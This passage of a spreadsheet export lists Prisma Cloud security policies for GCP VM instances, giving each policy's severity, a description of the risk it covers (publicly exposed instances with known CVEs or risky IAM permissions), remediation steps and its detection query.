      <c r="O2800" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2800" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2800" t="inlineStr"/>
      <c r="R2800" t="inlineStr"/>
      <c r="S2800" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2800" t="b">
        <v>0</v>
      </c>
      <c r="U2800" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2800" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2800" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have Cloud Function creation permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. GCP VM instance with Cloud Function creation permissions along with Service Account impersonation privileges would be able to escalate their permissions by creating a function that performs attacker controlled actions using the permissions of an impersonated Service Account. 
This policy checks for the following Cloud Function permissions:
'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs'
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2800"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00" t="inlineStr"/>
      <c r="Z2800" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ( 'gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Compute Instance (VM/Cloud Function) Assigned Cloud Function Creation Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2800" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2800" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:06</t>
        </is>
      </c>
      <c r="AC2800" t="inlineStr"/>
      <c r="AD2800" t="b">
        <v>1</v>
      </c>
      <c r="AE2800" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2800" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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00" t="inlineStr">
        <is>
          <t>52ca23c9-3999-48b7-af38-4409bda18db0</t>
        </is>
      </c>
      <c r="AI2800" t="inlineStr">
        <is>
          <t>c02fc0ea-24bd-4598-8eca-8c9e1c122dd6</t>
        </is>
      </c>
      <c r="AJ2800" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2800" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2801">
      <c r="A2801" t="inlineStr"/>
      <c r="B2801" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2801" s="2" t="inlineStr"/>
      <c r="D2801" t="n">
        <v>3</v>
      </c>
      <c r="E2801" t="n">
        <v>0</v>
      </c>
      <c r="F2801" t="n">
        <v>0</v>
      </c>
      <c r="G2801" t="b">
        <v>1</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2801" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2801" t="inlineStr">
        <is>
          <t>Privilege Escalation risk due to publicly exposed and vulnerable GCP VM instance [OpenSSL, CVE-2022-3786]</t>
        </is>
      </c>
      <c r="L2801" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2801" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2801" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2801" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2801" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2801" t="inlineStr"/>
      <c r="R2801" t="inlineStr"/>
      <c r="S2801" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2801" t="b">
        <v>0</v>
      </c>
      <c r="U2801" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2801" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2801" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-3786].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OpenSSL [CVE-2022-3786] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X2801"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CVE-2022-3786
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-3786</t>
        </is>
      </c>
      <c r="Y2801" t="inlineStr"/>
      <c r="Z2801" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-3786'))</t>
        </is>
      </c>
      <c r="AA2801" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2801" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2801" t="inlineStr"/>
      <c r="AD2801" t="b">
        <v>1</v>
      </c>
      <c r="AE2801" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2801" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>9c3d689b-2b8c-43bb-81b9-aa7051713e84</t>
        </is>
      </c>
      <c r="AI2801" t="inlineStr">
        <is>
          <t>2339fbf7-fe3b-4930-9bb5-cd12b7f1cad2</t>
        </is>
      </c>
      <c r="AJ2801" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2801" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2802">
      <c r="A2802" t="inlineStr"/>
      <c r="B2802" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2802" s="2" t="inlineStr"/>
      <c r="D2802" t="n">
        <v>7</v>
      </c>
      <c r="E2802" t="n">
        <v>0</v>
      </c>
      <c r="F2802" t="n">
        <v>0</v>
      </c>
      <c r="G2802" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2802" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2802" t="inlineStr">
        <is>
          <t>Remote code execution and lateral movement risk due to publicly exposed GCP Virtual Machine with overly permissive IAM role and known exploitable vulnerability [libwebp, CVE-2023-4863]</t>
        </is>
      </c>
      <c r="L2802" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2802" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2802" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2802" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2802" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2802" t="inlineStr"/>
      <c r="R2802" t="inlineStr"/>
      <c r="S2802" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2802" t="b">
        <v>0</v>
      </c>
      <c r="U2802" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2802" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2802" t="inlineStr">
        <is>
          <t>This policy identifies GCP Virtual Machine instances that are publicly exposed and have a known exploitable remote code execution vulnerability in libwebp [CVE-2023-4863]. Additionally, these instances have been detected with overly permissive IAM roles, which significantly increases the risk of lateral movement within the infrastructure. 
Remote code execution is a severe security concern, allowing unauthorized users to execute arbitrary code on the targeted system. When combined with excessive permissions, this poses a heightened risk, enabling attackers not only to compromise the vulnerable system but also to move laterally within the environment. 
Immediate attention is required to remediate the libwebp [CVE-2023-4863] vulnerability, review and restrict the IAM role permissions, and address the public exposure of the GCP Virtual Machine as soon as possible</t>
        </is>
      </c>
      <c r="X2802"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1. Identify and access the reported resource affected by CVE-2023-4863
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-4863</t>
        </is>
      </c>
      <c r="Y2802" t="inlineStr"/>
      <c r="Z2802" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance with permissions to impersonate a service account') AND with : (Vuln WHERE id IN ('CVE-2023-4863'))</t>
        </is>
      </c>
      <c r="AA2802" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2802" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:02</t>
        </is>
      </c>
      <c r="AC2802" t="inlineStr"/>
      <c r="AD2802" t="b">
        <v>1</v>
      </c>
      <c r="AE2802" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2802" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>79ae7822-b83b-471f-93ed-a52efeff7c90</t>
        </is>
      </c>
      <c r="AI2802" t="inlineStr">
        <is>
          <t>b9281d9e-7d14-4f93-b91a-8aba5536e7aa</t>
        </is>
      </c>
      <c r="AJ2802" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2802" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2803">
      <c r="A2803" t="inlineStr"/>
      <c r="B2803" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2803" s="2" t="inlineStr"/>
      <c r="D2803" t="inlineStr"/>
      <c r="E2803" t="inlineStr"/>
      <c r="F2803" t="inlineStr"/>
      <c r="G2803" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2803" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2803" t="inlineStr">
        <is>
          <t>Command injection risk due to publicly exposed and vulnerable GCP VM instance (Atlassian Bitbucket Server and Data Center, CVE-2022-36804)</t>
        </is>
      </c>
      <c r="L2803" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2803" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2803" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2803" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2803" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2803" t="inlineStr"/>
      <c r="R2803" t="inlineStr"/>
      <c r="S2803" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2803" t="b">
        <v>0</v>
      </c>
      <c r="U2803" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2803" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2803" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Command injection vulnerability (CVE-2022-36804).
Command injection vulnerability would allow an attacker to inject arbitrary commands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Atlassian Bitbucket Server and Data Center Command injection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Atlassian Bitbucket Server and Data Center (CVE-2022-36804) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2803"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CVE-2022-36804
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-36804</t>
        </is>
      </c>
      <c r="Y2803" t="inlineStr"/>
      <c r="Z2803" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-36804'))</t>
        </is>
      </c>
      <c r="AA2803" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2803" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:10</t>
        </is>
      </c>
      <c r="AC2803" t="inlineStr"/>
      <c r="AD2803" t="b">
        <v>1</v>
      </c>
      <c r="AE2803" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2803" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>30431c6d-1668-482b-9a79-6cdac15ba8c9</t>
        </is>
      </c>
      <c r="AI2803" t="inlineStr">
        <is>
          <t>8e719924-4d87-40ce-818b-f5eac1708d94</t>
        </is>
      </c>
      <c r="AJ2803" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2803" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2804">
      <c r="A2804" t="inlineStr">
        <is>
          <t>Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, CIS v2.0.0 (GCP) Level 2, NIST SP 800-172, Rehan, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS Controls v8.1, CIS v1.3.0 (GCP), ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, NIST CSF, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, CIS v1.1.0 (GCP), CSA CCM v4.0.12, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, SOC 2, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v1.2.0 (GCP), APRA (CPS 234) Information Security, ITSG-33, GDPR, HITRUST v.9.4.2 [Deprecated], GDPR, SOC 2, CIS v3.0.0 (GCP) Level 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2804" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2804" s="2" t="inlineStr"/>
      <c r="D2804" t="inlineStr"/>
      <c r="E2804" t="inlineStr"/>
      <c r="F2804" t="inlineStr"/>
      <c r="G2804" t="b">
        <v>1</v>
      </c>
      <c r="H28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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2804" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2804" t="inlineStr">
        <is>
          <t>GCP VM instance with Shielded VM features disabled</t>
        </is>
      </c>
      <c r="L2804" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2804" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2804" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2804" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2804" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2804" t="inlineStr">
        <is>
          <t>Virtual Machines</t>
        </is>
      </c>
      <c r="R2804" t="inlineStr">
        <is>
          <t>4.8</t>
        </is>
      </c>
      <c r="S2804" t="inlineStr"/>
      <c r="T2804" t="b">
        <v>0</v>
      </c>
      <c r="U2804" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2804" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2804" t="inlineStr">
        <is>
          <t>This policy identifies VM instances which have Shielded VM features disabled. Shielded VMs are virtual machines (VMs) on Google Cloud Platform hardened by a set of security controls that help defend against rootkits and bootkits. Shielded VM's verifiable integrity is achieved through the use of Secure Boot, virtual trusted platform module (vTPM)-enabled Measured Boot, and integrity monitoring. Shielded VM instances run firmware which is signed and verified using Google's Certificate Authority, ensuring that the instance's firmware is unmodified and establishing the root of trust for Secure Boot.
NOTE: You can only enable Shielded VM options on instances that have Shielded VM support. This policy reports VM instances that have Shielded VM support and are disabled with the Shielded VM features.</t>
        </is>
      </c>
      <c r="X2804" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate VM instances page
3. STOP the reported VM instance before editing the instance
NOTE: Before stoping the instance, Check the VM instance operational requirement.
4. After the instance stops, click 'EDIT'
5. In the Shielded VM section, select 'Turn on vTPM' and 'Turn on Integrity Monitoring'.
Optionally, if you do not use any custom or unsigned drivers on the instance, also select 'Turn on Secure Boot'.
6. Click on 'Save' and then START the instance. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y</t>
        </is>
      </c>
      <c r="Y2804" t="inlineStr"/>
      <c r="Z2804" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = '(status equals RUNNING and name does not start with "gke-") and shieldedInstanceConfig exists and (shieldedInstanceConfig.enableVtpm is false or shieldedInstanceConfig.enableIntegrityMonitoring is false)'
{"category":"General","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA2804" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2804" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2804" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-549-CKV_GCP_39</t>
        </is>
      </c>
      <c r="AD2804" t="b">
        <v>1</v>
      </c>
      <c r="AE2804" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2804" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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4" t="inlineStr">
        <is>
          <t>17ad5166-9858-47e8-85ea-e42575a2112e</t>
        </is>
      </c>
      <c r="AI2804" t="inlineStr">
        <is>
          <t>6a132d82-267f-40ed-a6c9-1b426df1e928</t>
        </is>
      </c>
      <c r="AJ2804" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2804" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2805">
      <c r="A2805" t="inlineStr"/>
      <c r="B2805" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2805" s="2" t="inlineStr"/>
      <c r="D2805" t="inlineStr"/>
      <c r="E2805" t="inlineStr"/>
      <c r="F2805" t="inlineStr"/>
      <c r="G2805" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2805" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2805" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Drupalgeddon2, CVE-2018-7600]</t>
        </is>
      </c>
      <c r="L2805" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2805" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2805" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2805" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2805" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2805" t="inlineStr"/>
      <c r="R2805" t="inlineStr"/>
      <c r="S2805" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2805" t="b">
        <v>0</v>
      </c>
      <c r="U2805" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2805" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2805" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [Drupalgeddon2, CVE-2018-7600].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Drupal installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the Drupalgeddon2 [CVE-2018-7600] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2805"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CVE-2018-7600
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2018-7600</t>
        </is>
      </c>
      <c r="Y2805" t="inlineStr"/>
      <c r="Z2805" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2018-7600 - Drupalgeddon2) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2018-7600'))</t>
        </is>
      </c>
      <c r="AA2805" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2805" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:36</t>
        </is>
      </c>
      <c r="AC2805" t="inlineStr"/>
      <c r="AD2805" t="b">
        <v>1</v>
      </c>
      <c r="AE2805" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2805" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>aba43fb9-3807-4093-9dd9-d2cbcc553c28</t>
        </is>
      </c>
      <c r="AI2805" t="inlineStr">
        <is>
          <t>636d01ad-c4f2-4ef8-8ad4-869b5e074c4c</t>
        </is>
      </c>
      <c r="AJ2805" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2805" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2806">
      <c r="A2806" t="inlineStr"/>
      <c r="B2806" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2806" s="2" t="inlineStr"/>
      <c r="D2806" t="n">
        <v>175</v>
      </c>
      <c r="E2806" t="n">
        <v>0</v>
      </c>
      <c r="F2806" t="n">
        <v>0</v>
      </c>
      <c r="G2806" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2806" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2806" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable GCP VM instance with primitive basic role assigned</t>
        </is>
      </c>
      <c r="L2806" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2806" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2806" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2806" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2806" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2806" t="inlineStr"/>
      <c r="R2806" t="inlineStr"/>
      <c r="S2806" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2806" t="b">
        <v>0</v>
      </c>
      <c r="U2806" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2806" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2806" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have primitive basic role attached.
Publicly exposed vulnerable VM instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Basic roles are highly permissive roles that existed prior to the introduction of IAM. Basic roles on the instance further helps the attackers to escalate their privileges, move laterally or perform other unauthorized actions in the cloud account.
This policy checks for the following basic roles:
'roles/editor', 'roles/owner'
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the VM instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X280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[MISCONFIGURATION]
It is recommended to the principle of least privilege for granting access.
To create a new instance with desired service account, please refer to the URL given below:
https://cloud.google.com/compute/docs/access/create-enable-service-accounts-for-instances#using
To update the assigned service account to VM, please refer to the URL given below:
https://cloud.google.com/compute/docs/access/create-enable-service-accounts-for-instances#changeserviceaccountandscopes
To update priviledges granted to a service account, please refer to the URL given below:
https://cloud.google.com/iam/docs/granting-changing-revoking-access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06" t="inlineStr"/>
      <c r="Z2806" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance has risky basic role assigned') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2806" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2806" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2806" t="inlineStr"/>
      <c r="AD2806" t="b">
        <v>1</v>
      </c>
      <c r="AE2806" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2806" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>62ae8f9f-cf0a-4490-8de5-1cf1e1a3b1ee</t>
        </is>
      </c>
      <c r="AI2806" t="inlineStr">
        <is>
          <t>c3feac01-e633-4e8f-a901-ee056c9e45b0</t>
        </is>
      </c>
      <c r="AJ2806" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2806" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2807">
      <c r="A2807" t="inlineStr"/>
      <c r="B2807" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2807" s="2" t="inlineStr"/>
      <c r="D2807" t="n">
        <v>5</v>
      </c>
      <c r="E2807" t="n">
        <v>0</v>
      </c>
      <c r="F2807" t="n">
        <v>0</v>
      </c>
      <c r="G2807" t="b">
        <v>1</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2807" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2807" t="inlineStr">
        <is>
          <t>Privilege Escalation risk due to publicly exposed and vulnerable GCP VM instance [Polkit, CVE-2021-4034]</t>
        </is>
      </c>
      <c r="L2807" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2807" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2807" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2807" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2807" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2807" t="inlineStr"/>
      <c r="R2807" t="inlineStr"/>
      <c r="S2807" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2807" t="b">
        <v>0</v>
      </c>
      <c r="U2807" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2807" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2807" t="inlineStr">
        <is>
